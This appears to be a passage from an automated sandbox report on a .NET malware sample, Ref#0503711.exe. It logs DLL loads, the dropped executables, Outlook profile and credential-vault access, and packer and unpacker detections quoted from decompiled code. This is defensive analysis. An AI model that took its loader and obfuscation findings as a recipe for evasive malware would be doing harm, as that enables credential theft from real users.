                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#0503711.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#0503711.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: Ref#0503711.exeStatic file information: File size 1907648 > 1048576
                      Source: Ref#0503711.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x19fc00
                      Source: Ref#0503711.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mscorlib.pdb# source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdb source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: %%.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbTe source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tmp2083.tmp.PDB source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb4ssMm2 source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbj source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbsP source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdbH source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.0000000001638000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: m0C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb]p source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.cs.Net Code: Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777259)),Type.GetTypeFromHandle(VQe29sNPbuw3Mw7NO5p.fnB7I1IxJy(16777263))})
                      .NET source code contains potential unpacker
                      Source: Ref#0503711.exe, -.cs.Net Code: _E000 System.AppDomain.Load(byte[])
                      Source: Ref#0503711.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: docdd.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#0503711.exe.6050000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.5fa0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.tmp2083.tmp.exe.5ba0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4506700.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1795600087.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: tmp2083.tmp.exe PID: 7652, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: tmp2083.tmp.exe PID: 7692, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197E015 push esp; retf 0_2_0197E019
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197DA78 push edi; retf 0_2_0197DA79
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_05E83291 push FFFFFFC7h; ret 0_2_05E83293
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_05E83A91 push FFFFFFBFh; ret 0_2_05E83A93
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A071F push es; ret 0_2_060A0730
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060AD1F2 push edx; ret 0_2_060AD1FD
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B29E0 push es; ret 0_2_060B2A90
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060C3EBC push ss; ret 0_2_060C3EBF
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_06211427 push es; iretd 0_2_06211428
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_06213C54 push fs; ret 0_2_06213C5F
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_06211F35 push es; ret 0_2_06211F38
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_063435AF push ebp; retf 0_2_063435B2
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD2C8B push ds; ret 1_2_00BD2C92
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012C0C55 push edi; retf 2_2_012C0C7A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B93E77 push edx; ret 3_2_05B93E7A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C3301 push cs; ret 4_2_017C3305
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C3E26 push E9000000h; retf 4_2_017C3E31
                      Source: Ref#0503711.exeStatic PE information: section name: .text entropy: 7.6840259996063836
                      Source: 0.2.Ref#0503711.exe.5d30000.10.raw.unpack, xPUceZiaJq5d1uh9UQG.csHigh entropy of concatenated method names: 'pMPi6qvaJB', 'U0tgRDmzyRbcgY9k5ih', 'd5WfDbtuhgUUTV4436T', 'EhIDgUmBrOjXtwL0c0y', 'EbFeYamA6tTSH303B76', 'bhc9Vhm8vwpFf6ixZBy', 'UVccM3mX1CTguyBleJf'
                      Source: 0.2.Ref#0503711.exe.5d30000.10.raw.unpack, KgaJdhi9yCnBKYwNKut.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'LH0i2xwXK5', 'NtProtectVirtualMemory', 'jWJG39m7SaPVsfau3UY', 'hyQXBnm6HbCDuR2bThv', 'FH6oMJmTTaDuFtyqEYp', 'ui0Wl7m1Xh2V2otOOqg'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, Gw56uEORyyixGR93gyN.csHigh entropy of concatenated method names: 'R8kOYurBG5', 'U4SxKxPgor3u7OmWZMc', 'NvbPc7PQXjEpMpUd06X', 'EBFgyrPw0wkScxNZ7Kr', 'BRWAOdP3lwKRTmirqti', 'iwk936P8lltU1lG84ko', 'gYCXDxPXEDsZw26Ky11', 'geLis7PIcGJi3QKRbsm', 'bpagOJPnXBSpWP2oQ2x', 'IhSbpXPf1tnpDLqJ9aY'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'j1OxApHAR8qj4r23RCv'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, epRhyVdZHC28EkrEKeV.csHigh entropy of concatenated method names: 'Eu4dqsi2wx', 'Np3dx1xNWl', 'yejli2akoG4RuRaX03t', 'icKBKIaBSGTq7xJCChV', 't57318ao8LKEUx7OdrN', 'BQmGD6acbMP5Y9Cje0f', 'chQtC2aAcvHohWYH9k7'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, C4k6bAOprfFv8I3Afxh.csHigh entropy of concatenated method names: 'z0eOVohqIn', 'onYj57tkC7QSRLpln9a', 'R5tmrYtBUOmIFtx4RD8', 'srAhJEtAE9H0rTyWGkZ', 'z77c4wtzQL1O0RjW9lX', 'zT4kTmPux2LA0ZZ2WT0', 'TntMywtoxS8ag7B0ctZ', 'VdNGZgtceycU6aOfDZe'
